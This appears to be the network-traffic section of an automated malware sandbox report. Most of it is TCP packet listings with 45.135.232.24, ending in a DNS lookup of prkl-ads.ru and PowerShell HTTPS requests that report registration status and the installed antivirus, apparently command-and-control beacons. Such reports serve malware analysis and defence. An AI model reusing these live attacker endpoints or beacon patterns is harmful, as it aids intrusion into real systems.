                                                  Aug 21, 2023 19:51:33.335709095 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335726023 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335743904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.335761070 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336064100 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336081028 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336098909 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336116076 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336158037 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.336174965 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.396404028 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397180080 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397224903 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397243977 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397260904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397471905 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397495031 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397494078 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.397512913 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397531986 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397548914 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397619963 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.397891045 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397912025 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397928953 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.397945881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398076057 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398094893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398112059 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398129940 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398385048 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398405075 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398422003 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398438931 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398574114 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398591042 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398608923 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398631096 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.398891926 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.399005890 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.459600925 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459657907 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459708929 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459757090 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459805012 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459850073 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459897995 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459943056 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.459990025 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460624933 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460686922 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460731983 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460782051 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460829020 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.460884094 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461020947 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461062908 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461110115 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461153030 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461200953 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461246967 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461296082 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461339951 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461386919 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461433887 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461478949 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461524963 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461568117 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461613894 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461657047 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461704016 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461750031 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461802006 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461843967 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461889982 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461935997 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.461950064 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.461981058 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462028027 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462074041 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462090015 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.462121010 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462263107 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462306023 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462353945 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462399960 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462446928 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462491035 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462538004 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462582111 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462627888 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462733984 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.462776899 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.463406086 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.463524103 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.526067019 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526124954 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526160002 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526192904 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526324987 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526360035 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526443005 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526568890 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526726007 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526761055 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526823044 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526915073 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526948929 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.526978970 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527013063 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527048111 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527081966 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527115107 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527148962 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527182102 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527215004 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527251005 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527285099 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527318001 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527349949 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527383089 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527416945 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527448893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527483940 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527519941 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527553082 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527780056 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.527848005 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527884007 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527918100 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527972937 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.527986050 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.528112888 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528147936 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528182030 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528273106 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528459072 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528493881 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528629065 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528841019 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.528876066 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529206991 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529239893 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529273033 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529306889 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529735088 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529767990 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.529803038 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.530153990 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.530275106 CEST497479878192.168.2.345.135.232.24
                                                  Aug 21, 2023 19:51:33.591449976 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591505051 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591635942 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591675997 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591931105 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.591965914 CEST98784974745.135.232.24192.168.2.3
                                                  Aug 21, 2023 19:51:33.592001915 CEST98784974745.135.232.24192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 21, 2023 19:51:33.592035055 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.592559099 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.592597961 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.592890024 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.592925072 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.592959881 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.592993975 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593214989 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593252897 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593286037 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593580008 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593616009 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593647957 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593683004 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593715906 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593926907 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.593961954 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594177961 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594211102 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594243050 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594564915 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594597101 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:51:33.594600916 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594722033 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:51:33.594896078 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594932079 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.594965935 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595160961 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595194101 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595227957 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595261097 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595293999 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595556021 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595588923 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595621109 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595880032 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595913887 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595944881 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.595973969 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596007109 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596185923 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596219063 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596544027 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596577883 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596611023 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.596642017 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.597012997 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:51:33.597131968 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:51:33.656757116 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.656820059 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657120943 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657159090 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657335997 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657372952 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657706976 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657741070 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.657957077 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658113956 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658269882 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658448935 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658483028 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658643007 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658830881 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658876896 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.658978939 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659190893 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659285069 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659579992 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659653902 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659743071 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659797907 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.659831047 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660048962 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660131931 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660281897 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660315990 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660394907 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660479069 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:51:33.660577059 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660635948 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660777092 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660811901 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.660902977 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661094904 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661129951 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661314011 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661349058 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661381960 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661415100 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661704063 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661736965 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661770105 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661906004 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.661940098 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.662026882 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.662164927 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.662254095 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.662287951 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.662323952 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.662560940 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.666559935 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.722652912 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.722688913 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.722707987 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.722820997 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.723141909 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.723165989 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.723356962 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.723470926 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.723670006 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.723927021 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724236965 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724275112 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724293947 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724395990 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724539042 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724751949 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724770069 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.724968910 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.725004911 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.725044966 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.725176096 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.725240946 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.725367069 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.725488901 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.733498096 CEST | 9878 | 49747 | 45.135.232.24 | 192.168.2.3
Aug 21, 2023 19:51:33.788891077 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
Aug 21, 2023 19:53:53.845912933 CEST | 49747 | 9878 | 192.168.2.3 | 45.135.232.24
UDP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 21, 2023 19:50:54.260333061 CEST | 52097 | 53 | 192.168.2.3 | 8.8.8.8
Aug 21, 2023 19:50:54.291064978 CEST | 53 | 52097 | 8.8.8.8 | 192.168.2.3

DNS queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 21, 2023 19:50:54.260333061 CEST | 192.168.2.3 | 8.8.8.8 | 0x69b4 | Standard query (0) | prkl-ads.ru | A (IP address) | IN (0x0001) | false

DNS answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 21, 2023 19:50:54.291064978 CEST | 8.8.8.8 | 192.168.2.3 | 0x69b4 | No error (0) | prkl-ads.ru | | 81.177.140.69 | A (IP address) | IN (0x0001) | false
                                                  • prkl-ads.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49735 | 81.177.140.69 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2023-08-21 17:50:54 UTC | 0 | OUT | GET /?status=reg&key=llks74638sj&site=Test HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: prkl-ads.ru
Connection: Keep-Alive
2023-08-21 17:50:54 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Mon, 21 Aug 2023 17:50:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Server: Apache/2.4.6 (CentOS) PHP/7.4.33
X-Powered-By: PHP/7.4.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49736 | 81.177.140.69 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
2023-08-21 17:50:56 UTC | 0 | OUT | GET /?status=start&av=Windows%20Defender HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: prkl-ads.ru
2023-08-21 17:50:56 UTC | 0 | IN | HTTP/1.1 200 OK
